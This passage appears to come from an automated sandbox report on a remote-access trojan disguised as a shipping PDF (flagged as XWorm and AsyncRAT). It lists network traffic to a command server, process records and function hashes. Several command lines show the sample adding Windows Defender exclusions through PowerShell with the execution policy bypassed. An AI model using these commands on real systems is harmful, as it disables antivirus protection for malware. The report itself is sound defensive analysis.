Oct 8, 2024 11:31:46.436476946 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:46.441309929 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:46.441411018 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:46.446254969 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:49.412920952 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:49.417927027 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:49.944425106 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:49.949784040 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:50.272258997 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:50.277085066 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:50.287751913 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:50.292586088 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:52.502744913 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:52.504998922 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:52.509793043 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:52.741317987 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:52.746366978 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:53.893655062 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:53.895621061 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:53.900639057 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:53.900758982 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:53.905776978 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:55.006611109 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:55.012363911 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:55.117961884 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:55.120534897 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:55.125369072 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:56.120320082 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:56.122579098 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:56.127506971 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:57.245663881 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:57.287405968 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:57.988851070 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:57.992388964 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:57.997370005 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:59.946751118 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:59.951889992 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:32:00.304275036 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:32:00.309341908 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:32:03.187760115 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:32:03.190711975 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:32:03.195548058 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:32:05.393101931 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:32:05.394984007 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:32:05.399974108 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:32:14.366010904 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:32:14.370837927 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:32:14.921942949 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:32:14.924364090 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:32:14.929208994 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:32:23.506779909 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:32:23.511691093 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:32:23.837337017 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:32:23.838121891 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:32:23.843086004 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:32:25.332473040 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:32:25.381285906 CEST	49763	7061	192.168.2.5	104.250.180.178

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 11:29:00.762660027 CEST	53	58791	162.159.36.2	192.168.2.5
Oct 8, 2024 11:29:02.290194988 CEST	53	60147	1.1.1.1	192.168.2.5

Target ID:	0
Start time:	05:28:15
Start date:	08/10/2024
Path:	C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe"
Imagebase:	0x500000
File size:	512'000 bytes
MD5 hash:	70566F5275EA7AC9FCA0EBD9C31BB101
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2087295289.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2087295289.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2087295289.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2087295289.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2087295289.0000000002A6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2087295289.0000000002A6D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:28:16
Start date:	08/10/2024
Path:	C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe"
Imagebase:	0xad0000
File size:	512'000 bytes
MD5 hash:	70566F5275EA7AC9FCA0EBD9C31BB101
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.4530058708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.4530058708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.4534290807.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	05:28:19
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe'
Imagebase:	0x70000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:28:19
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:28:22
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe'
Imagebase:	0x70000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:28:22
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:28:26
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Imagebase:	0x70000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:28:26
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:28:31
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Imagebase:	0x70000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:28:31
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1%
Total number of Nodes:	311
Total number of Limit Nodes:	25

Executed Functions

Function 0896D3D4 Relevance: .9, Instructions: 931COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089808015.0000000008960000.00000040.00000800.00020000.00000000.sdmp, Offset: 08960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8960000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4deb3f2dd0a58c3b8aa2051cac43f7dfbb4dc81a77984c791d26e3ae21c76f8
Instruction ID: 84cd71cd5b726af0f0fac68b4fe5d313349fc23362a355a17003525f7589c88b
Opcode Fuzzy Hash: b4deb3f2dd0a58c3b8aa2051cac43f7dfbb4dc81a77984c791d26e3ae21c76f8
Instruction Fuzzy Hash: A4A21835E002198FDB15EB68C8586EDB7B1FF89300F1482A9D90AB7351EB74AE95CF50

Function 08961340 Relevance: .7, Instructions: 651COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089808015.0000000008960000.00000040.00000800.00020000.00000000.sdmp, Offset: 08960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8960000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe3a6e013f368b4dade7531850e8d0660f396d2fd210074939d8a36d85fdd497
Instruction ID: e7eb4c79ac14e34c0743b1b230bbebdb444d7bb8e7cfd2bfa54f6ac56a3c755a
Opcode Fuzzy Hash: fe3a6e013f368b4dade7531850e8d0660f396d2fd210074939d8a36d85fdd497
Instruction Fuzzy Hash: 71420534711200CFCB28AB78C5586697BF6FF8931AB64486EE507EB364DF319842DB41

Function 08963A50 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089808015.0000000008960000.00000040.00000800.00020000.00000000.sdmp, Offset: 08960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8960000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61f2ef2172fee3ed9260807bb0c2c4a92e7336ad97da902927029c3957e39496
Instruction ID: 5f16e07b0e17b9d918c2f09ed928062cae2b0e7738235cc7e090e6d2a4f59a57
Opcode Fuzzy Hash: 61f2ef2172fee3ed9260807bb0c2c4a92e7336ad97da902927029c3957e39496
Instruction Fuzzy Hash: 67226A30A10219CFCB14EF68D984AADBBB6FF85311F1585A9E409AB325DB30ED95CF50

Function 06B6BB38 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a00644ccdb42071f019fab8db68ff57d6a725aaf39c848995516ce5d0cbf76a8
Instruction ID: 226bc2709e4695bf97de23ce6935f5cdc801e294b34f6c9ffd957304ff10d950
Opcode Fuzzy Hash: a00644ccdb42071f019fab8db68ff57d6a725aaf39c848995516ce5d0cbf76a8
Instruction Fuzzy Hash: 5D21E4B1D056188BEB58CFABC8447DEFEF7AFC9300F14C06AD509A6264DB7409458FA0

Function 06B6BB48 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc87c14ef029fdd9b2d0d71b392f2534d292527e3818e3ec06a46653f25d0a9
Instruction ID: e419a915f6759e006086e0bc9d2cd65643103b8d8f8244b1a4e7a0bc2b4e0099
Opcode Fuzzy Hash: 3dc87c14ef029fdd9b2d0d71b392f2534d292527e3818e3ec06a46653f25d0a9
Instruction Fuzzy Hash: 7921B3B1D016188BEB58CFABC9447DEFAF7AFC8300F14C06AD508A6264DB7409458F90

Function 00ADD550 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00ADD5DE
GetCurrentThread.KERNEL32 ref: 00ADD61B
GetCurrentProcess.KERNEL32 ref: 00ADD658
GetCurrentThreadId.KERNEL32 ref: 00ADD6B1

Memory Dump Source

Source File: 00000000.00000002.2086010823.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 8115d88cb10fb44f6448003d0193a412c8c77720d066de83fc1b6e6232c900b9
Instruction ID: c81820a1957c472a3c6c08543e08271bf76210db4755c3795941568027be059f
Opcode Fuzzy Hash: 8115d88cb10fb44f6448003d0193a412c8c77720d066de83fc1b6e6232c900b9
Instruction Fuzzy Hash: 355175B49003498FDB14DFA9D548BAEBFF1EF88314F20C459E009A73A0D7789948CB65

Function 00ADD560 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00ADD5DE
GetCurrentThread.KERNEL32 ref: 00ADD61B
GetCurrentProcess.KERNEL32 ref: 00ADD658
GetCurrentThreadId.KERNEL32 ref: 00ADD6B1

Memory Dump Source

Source File: 00000000.00000002.2086010823.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 54397ac0189c981e5fc84d0cf394c0545755e5fc75493c60a5125a51547aa902
Instruction ID: fa04a6c97bb2441fb5d4b7d59739c8302627bfd8f75be45ca2a7d6e156a03bcf
Opcode Fuzzy Hash: 54397ac0189c981e5fc84d0cf394c0545755e5fc75493c60a5125a51547aa902
Instruction Fuzzy Hash: 1D5155B49003098FDB14DFA9D548BAEBBF1FF88314F20C459E009A73A0D778A944CBA5

Function 04F980A0 Relevance: 2.7, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 04F980E7
, xrefs: 04F980EE

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 581b0c9cf46111f4103c5f3977dfe7ade95c8afcbceb1cb3bdc292d0338b19a0
Instruction ID: 30097c149de3f93acff433ef01cb5c388a59b2ffc5d76caaa77c44c81285cbe5
Opcode Fuzzy Hash: 581b0c9cf46111f4103c5f3977dfe7ade95c8afcbceb1cb3bdc292d0338b19a0
Instruction Fuzzy Hash: FC61D535910701CFEB10EF29D88564477F1FF96304B4086A8D849AB326EB71F989CF81

Function 04F97654 Relevance: 2.7, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 04F980E7
, xrefs: 04F980EE

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: c8581e780404e1f0e299813b9c2f4bd6e485b9b5284737f11cdcdd56e2d47bd2
Instruction ID: 3ad0dfa0030a0a121b3fdfbceab47271e86e8427d925f1acc54ee33da18b1d20
Opcode Fuzzy Hash: c8581e780404e1f0e299813b9c2f4bd6e485b9b5284737f11cdcdd56e2d47bd2
Instruction Fuzzy Hash: 5461D135910701CFEB14EF2AD885554B7F1FF96304B4086A8D949AB326EB71F88ACF81

Function 06B66140 Relevance: 2.6, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8aq, xrefs: 06B661D3
8aq, xrefs: 06B6619C

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: 8aq$8aq
API String ID: 0-1589283582
Opcode ID: 907a9969ad1fc85f67ec015e7eda8e7427b6a0d04042d3ae3d8934d6e55003cf
Instruction ID: e0430b598c9fd9a3bdfc5d47e3993e188403b2ac46e5fd3687cf2b478ff7d588
Opcode Fuzzy Hash: 907a9969ad1fc85f67ec015e7eda8e7427b6a0d04042d3ae3d8934d6e55003cf
Instruction Fuzzy Hash: B421E7B4B00214CFD7849E7A9914A2B77EAEBC8311B244479E606D7385EE34CD018797

Function 00ADAEB8 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00ADB11E

Memory Dump Source

Source File: 00000000.00000002.2086010823.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 758a880e7987db372d9d9a561f6526dd54fd6adbf7d7b17b758e112ef57e3d34
Instruction ID: e7b9487d327be58c62123b659596e866b70122f8230427de85a6bd48ca3741c1
Opcode Fuzzy Hash: 758a880e7987db372d9d9a561f6526dd54fd6adbf7d7b17b758e112ef57e3d34
Instruction Fuzzy Hash: 138145B0A00B458FD724DF2AD44479ABBF5FF88300F008A6AE49AD7B51D735E949CB91

Function 00AD5A94 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2086010823.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b05b03f89c291065b931b310c19c22abf27e16a696759542b2fa71db8991ae1c
Instruction ID: e1d9bd3aaf5992ce4c11534f72afc8ee817b6ceb7821663aa8c96ee95eb28040
Opcode Fuzzy Hash: b05b03f89c291065b931b310c19c22abf27e16a696759542b2fa71db8991ae1c
Instruction Fuzzy Hash: D341BAB6C04659CFDB11CFA8C858BDEBBB0AF55315F14818BC40AAB365C776A90ACF40

Function 00AD591C Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00AD59D9

Memory Dump Source

Source File: 00000000.00000002.2086010823.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d1b3d5b4c1556aa29cb5983bc312f3861412be0f101a87d1a0a76eb3c9eddff3
Instruction ID: 8af46e601348422f26614d1e45bed9a19faa59e853769032b0431d0d49798a24
Opcode Fuzzy Hash: d1b3d5b4c1556aa29cb5983bc312f3861412be0f101a87d1a0a76eb3c9eddff3
Instruction Fuzzy Hash: 8741F2B4C00719CFDB24CFA9C884B9EFBB5BF49304F20816AD419AB251DB75694ACF91

Function 00AD4514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00AD59D9

Memory Dump Source

Source File: 00000000.00000002.2086010823.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2a3b6c6e13e3a0f5ddcf0c4b4db251bae3207d730615e458a32e1d3efe35cc56
Instruction ID: ec46fef7996d50aa44ec6e9d9c3d8a2a2c7526c27f4f6f8ca62c41e2ddd70990
Opcode Fuzzy Hash: 2a3b6c6e13e3a0f5ddcf0c4b4db251bae3207d730615e458a32e1d3efe35cc56
Instruction Fuzzy Hash: 7841F2B4C0071DCBDB24CFA9C848B9EBBB5BF48304F20816AD409AB255DB75694ACF91

Function 02A06799 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,02A06785,?,?), ref: 02A06837

Memory Dump Source

Source File: 00000000.00000002.2087167899.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a00000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: a78be420a93518c551b590267d1f3ffae984b48c1e8e4de8b6624798f60aae49
Instruction ID: 6e300648b1ba25f0517e66a73d445302180eae95dc1d706d1db0d129cad4b33e
Opcode Fuzzy Hash: a78be420a93518c551b590267d1f3ffae984b48c1e8e4de8b6624798f60aae49
Instruction Fuzzy Hash: 3F3113B5D002499FCB10CFAAE880AEEFBF4FF48314F14842AE918A7240D735A555CFA0

Function 02A051FC Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,02A06785,?,?), ref: 02A06837

Memory Dump Source

Source File: 00000000.00000002.2087167899.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a00000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 0b36add38183e808dc3e50ec5e903d10f7208f9b9ad94bb298a6ba09c39345fa
Instruction ID: 22dff6fd2f35ded38c8a851f1883ee7801481888ad7f96261ccd2c705a49e70f
Opcode Fuzzy Hash: 0b36add38183e808dc3e50ec5e903d10f7208f9b9ad94bb298a6ba09c39345fa
Instruction Fuzzy Hash: B23100B5D003499FCB10CF9AD884AAEFBF8FF48314F14842AE919A7250D774A954CFA4

Function 00ADD7A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ADD82F

Memory Dump Source

Source File: 00000000.00000002.2086010823.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d28675e84ee1bbea25e0329ff9f59fc7f922e847f0c2b43e76be5b0fce948a4a
Instruction ID: 76f73863ee01549067adc521c4b7a4ee0688440ccedc84d7226857bf58fa4010
Opcode Fuzzy Hash: d28675e84ee1bbea25e0329ff9f59fc7f922e847f0c2b43e76be5b0fce948a4a
Instruction Fuzzy Hash: DB21E6B59002489FDB10CFAAD584ADEFFF9FB49310F14845AE958A7311D379A944CFA0

Function 00ADD7A8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ADD82F

Memory Dump Source

Source File: 00000000.00000002.2086010823.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f0a25593c6990de6e2aba635f209d346f6417a5e446f20ee3153593aea5b496d
Instruction ID: 8b3dc0e0b1462280d0378b6753e648837a231842492aeb2349c7c25675ba7752
Opcode Fuzzy Hash: f0a25593c6990de6e2aba635f209d346f6417a5e446f20ee3153593aea5b496d
